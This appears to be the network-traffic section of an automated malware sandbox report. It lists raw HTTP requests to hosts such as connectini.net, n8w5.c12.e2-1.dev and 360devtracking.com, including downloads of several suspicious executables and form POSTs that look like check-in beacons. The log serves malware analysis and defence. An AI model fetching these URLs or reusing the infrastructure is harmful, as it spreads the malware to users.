Network Analysis

POST /Series/SuperNitouDisc.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 51 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /WeUninstalled.exe HTTP/1.1 Host: wewewe.s3.eu-central-1.amazonaws.com Connection: Keep-Alive

GET /doma/Villains-Wiki/pub-LJWuMU9jpVNtx.exe HTTP/1.1 Host: n8w5.c12.e2-1.dev Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Feb 2023 02:32:09 GMT Content-Type: binary/octet-stream Content-Length: 599552 Connection: keep-alive Accept-Ranges: bytes Content-Security-Policy: block-all-mixed-content ETag: "ab0394e973175c02ee34a0322794906a" Last-Modified: Tue, 31 Jan 2023 15:58:39 GMT No-Gzip-Compression: true Strict-Transport-Security: max-age=31536000; includeSubDomains Vary: Origin Vary: Accept-Encoding X-Amz-Request-Id: 173FE123A6996D13 X-Content-Type-Options: nosniff X-Minio-Compressed: s2 X-Xss-Protection: 1; mode=block x-amz-version-id: null

GET /doma/Villains-Wiki/hand-LJWuMU9jpVNtx.exe HTTP/1.1 Host: n8w5.c12.e2-1.dev Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Feb 2023 02:32:09 GMT Content-Type: binary/octet-stream Content-Length: 129024 Connection: keep-alive Accept-Ranges: bytes Content-Security-Policy: block-all-mixed-content ETag: "70a9b681d28137cfb4f0b4ab59ef51c6" Last-Modified: Tue, 31 Jan 2023 15:58:32 GMT No-Gzip-Compression: true Strict-Transport-Security: max-age=31536000; includeSubDomains Vary: Origin Vary: Accept-Encoding X-Amz-Request-Id: 173FE123A8A59DA4 X-Content-Type-Options: nosniff X-Minio-Compressed: s2 X-Xss-Protection: 1; mode=block x-amz-version-id: null

GET /doma/widgets/powerOff.exe HTTP/1.1 Host: n8w5.c12.e2-1.dev

HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Feb 2023 02:32:12 GMT Content-Type: binary/octet-stream Content-Length: 858837 Connection: keep-alive Accept-Ranges: bytes Content-Security-Policy: block-all-mixed-content ETag: "c0538198613d60407c75c54c55e69d91" Last-Modified: Tue, 31 Jan 2023 16:00:19 GMT No-Gzip-Compression: true Strict-Transport-Security: max-age=31536000; includeSubDomains Vary: Origin Vary: Accept-Encoding X-Amz-Request-Id: 173FE1243B942D7B X-Content-Type-Options: nosniff X-Minio-Compressed: s2 X-Xss-Protection: 1; mode=block x-amz-version-id: null

GET /WeUninstalled.exe HTTP/1.1 Host: wewewe.s3.eu-central-1.amazonaws.com

GET /doma/Villains-Wiki/up-do-dat-LJWuMU9jpVNtx.exe HTTP/1.1 Host: n8w5.c12.e2-1.dev

HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Feb 2023 02:32:13 GMT Content-Type: binary/octet-stream Content-Length: 479744 Connection: keep-alive Accept-Ranges: bytes Content-Security-Policy: block-all-mixed-content ETag: "c4ffd52c9e7fd2fe9ce71298c36d1ec2" Last-Modified: Tue, 31 Jan 2023 15:59:18 GMT No-Gzip-Compression: true Strict-Transport-Security: max-age=31536000; includeSubDomains Vary: Origin Vary: Accept-Encoding X-Amz-Request-Id: 173FE12468366FA3 X-Content-Type-Options: nosniff X-Minio-Compressed: s2 X-Xss-Protection: 1; mode=block x-amz-version-id: null

GET /WeUninstalled.exe HTTP/1.1 Host: wewewe.s3.eu-central-1.amazonaws.com

GET /S2S/Disc/Disc.php?ezok=power2off2&tesla=8 HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Feb 2023 02:32:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

POST /Series/Conumer2kenpachi.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

POST /Series/Conumer4Publisher.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Cache-Control: no-store,no-cache Pragma: no-cache Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /Series/publisher/1/KR.json HTTP/1.1 Host: connectini.net Cache-Control: no-store,no-cache Pragma: no-cache

HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Feb 2023 02:33:20 GMT Content-Type: application/json Content-Length: 4184 Last-Modified: Mon, 11 Apr 2022 13:54:12 GMT Connection: keep-alive ETag: "62543304-1058" X-Powered-By: PleskLin Accept-Ranges: bytes

GET /Series/kenpachi/2/goodchannel/KR.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Feb 2023 02:33:36 GMT Content-Type: application/json Content-Length: 5420 Last-Modified: Thu, 02 Feb 2023 02:15:02 GMT Connection: keep-alive ETag: "63db1ca6-152c" X-Powered-By: PleskLin Accept-Ranges: bytes

GET /Series/configPoduct/2/goodchannel.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Feb 2023 02:33:37 GMT Content-Type: application/json Content-Length: 344 Connection: keep-alive X-Accel-Version: 0.01 Last-Modified: Mon, 11 Apr 2022 13:48:37 GMT ETag: "158-5dc613383b411" Accept-Ranges: bytes X-Powered-By: PleskLin

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT ETag: "37d-5f2b652c27a80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 02 Feb 2023 03:32:09 GMT Date: Thu, 02 Feb 2023 02:32:09 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT ETag: "37d-5f2b652c27a80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 02 Feb 2023 03:32:09 GMT Date: Thu, 02 Feb 2023 02:32:09 GMT Connection: keep-alive

POST /ezzcbmueaa4iwhvb/fmovies HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 360devtracking.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue

GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Thu, 02 Feb 2023 02:33:02 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-02-02-02; expires=Sat, 04-Mar-2023 02:33:02 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=ARSKqsK14Hld-gUKjovzDcT--sqKsg7L22IawKDMMrHqr0TQej7xMVDBLA; expires=Tue, 01-Aug-2023 02:33:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=Ztb9REZQAHi_gaalViPIGAiDVz-2mdWslSsl5nIrSMke03iPZ5ym6gQvjhqhrZrwQcqRjAdn75R7dZ_uP6pb51KOLyot2zUT2d9GAGW-2l3DGAG6ufYAcBqKNpmCc62khjLVofb204CsNO0C2Wb0gynlcq4uDCTBhI3GKiBW6_M; expires=Fri, 04-Aug-2023 02:33:02 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT ETag: "37d-5f2b652c27a80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 02 Feb 2023 03:33:27 GMT Date: Thu, 02 Feb 2023 02:33:27 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT ETag: "37d-5f2b652c27a80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 02 Feb 2023 03:33:27 GMT Date: Thu, 02 Feb 2023 02:33:27 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 20 Jan 2023 18:36:10 GMT ETag: "37d-5f2b652c27a80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 02 Feb 2023 03:33:27 GMT Date: Thu, 02 Feb 2023 02:33:27 GMT Connection: keep-alive

POST /ezzcbmueaa4iwhvb/fmovies HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 360devtracking.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue